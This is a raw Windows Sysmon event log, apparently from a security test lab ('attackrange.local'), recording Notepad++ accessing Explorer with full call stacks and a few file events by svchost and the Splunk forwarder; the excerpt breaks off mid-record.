21e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.739{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001046474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.739{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb|C:\Windows\System32\SHELL32.dll+13dc47|C:\Windows\System32\SHELL32.dll+13dbca|C:\Windows\System32\COMDLG32.dll+10e08 10341000x80000000000000001046473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.738{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8 10341000x80000000000000001046472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.738{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\COMDLG32.dll+1e967|C:\Windows\System32\SHLWAPI.dll+9fc1|C:\Windows\System32\SHLWAPI.dll+9edd|C:\Windows\System32\SHLWAPI.dll+9d96|C:\Windows\System32\SHLWAPI.dll+9c0d|C:\Windows\System32\SHELL32.dll+13ea57|C:\Windows\System32\SHELL32.dll+13ded8|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001046471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.721{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001046470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.721{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+365bd 10341000x80000000000000001046469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.721{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001046468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.721{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+1b27d|C:\Windows\system32\explorerframe.dll+345ab|C:\Windows\system32\explorerframe.dll+33f04|C:\Windows\system32\explorerframe.dll+32faa|C:\Windows\system32\explorerframe.dll+3308c|C:\Windows\System32\SHELL32.dll+1028d3|C:\Windows\System32\SHELL32.dll+103034|C:\Windows\system32\DUI70.dll+27a09|C:\Windows\system32\DUI70.dll+2e18d|C:\Windows\system32\DUI70.dll+15e98|C:\Windows\system32\DUI70.dll+24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000001046467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.658{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+1746d2|C:\Windows\System32\windows.storage.dll+174ba6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814 10341000x80000000000000001046466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.643{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1747e9|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001046465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.643{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+174765|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e|C:\Windows\System32\SHELL32.dll+13e446|C:\Windows\System32\SHELL32.dll+13dec3|C:\Windows\System32\SHELL32.dll+13dadb 10341000x80000000000000001046464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.643{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f 10341000x80000000000000001046463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.643{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+174749|C:\Windows\System32\windows.storage.dll+174907|C:\Windows\System32\windows.storage.dll+174e38|C:\Windows\System32\windows.storage.dll+1751eb|C:\Windows\System32\windows.storage.dll+143885|C:\Windows\System32\windows.storage.dll+145236|C:\Windows\System32\windows.storage.dll+145ab1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e79c|C:\Windows\System32\SHELL32.dll+6e2e5|C:\Windows\System32\SHELL32.dll+6edfd|C:\Windows\System32\SHELL32.dll+7241f|C:\Windows\System32\SHELL32.dll+13e82e 10341000x80000000000000001046462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.474{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+c5d7a|C:\Windows\System32\SHELL32.dll+84ae4|C:\Windows\System32\SHELL32.dll+8236b|C:\Windows\System32\SHELL32.dll+81e4d|C:\Windows\System32\SHELL32.dll+a2589|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686|C:\Program Files\Notepad++\notepad++.exe+1f2c8a|C:\Program Files\Notepad++\notepad++.exe+1e001c|C:\Program Files\Notepad++\notepad++.exe+1e3f1b|C:\Program Files\Notepad++\notepad++.exe+1defd1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 10341000x80000000000000001046461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.474{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+c5d68|C:\Windows\System32\SHELL32.dll+84ae4|C:\Windows\System32\SHELL32.dll+8236b|C:\Windows\System32\SHELL32.dll+81e4d|C:\Windows\System32\SHELL32.dll+a2589|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686|C:\Program Files\Notepad++\notepad++.exe+1f2c8a|C:\Program Files\Notepad++\notepad++.exe+1e001c|C:\Program Files\Notepad++\notepad++.exe+1e3f1b|C:\Program Files\Notepad++\notepad++.exe+1defd1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7 10341000x80000000000000001046460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.474{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+c5d68|C:\Windows\System32\SHELL32.dll+84ae4|C:\Windows\System32\SHELL32.dll+8236b|C:\Windows\System32\SHELL32.dll+81e4d|C:\Windows\System32\SHELL32.dll+a2589|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686|C:\Program Files\Notepad++\notepad++.exe+1f2c8a|C:\Program Files\Notepad++\notepad++.exe+1e001c|C:\Program Files\Notepad++\notepad++.exe+1e3f1b|C:\Program Files\Notepad++\notepad++.exe+1defd1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 23542300x80000000000000001046459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.458{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=BEF5780075A37A08085079D09E4D8F96,SHA256=708EFF44DD8417FEEE5FAF6AA9553038A7ECC3E9F14BC66A503FD0FAEDA1AB21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.789{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29AD3ABE04E0E52406EEE7217DA31D5B,SHA256=21DA6DD0E0E8F66406502095CED6E0F72BC4B0235463607E43EA18C7761E48A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806367Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:39.051{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E56C5C441B06DB05A87406ECDD8A79F,SHA256=C6C88F5FD7088439C12A768B2B6C143DED63A2341A4376EDBEEC7E4775AFF3BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.021{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.021{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001046523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.021{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001046522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:39.021{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 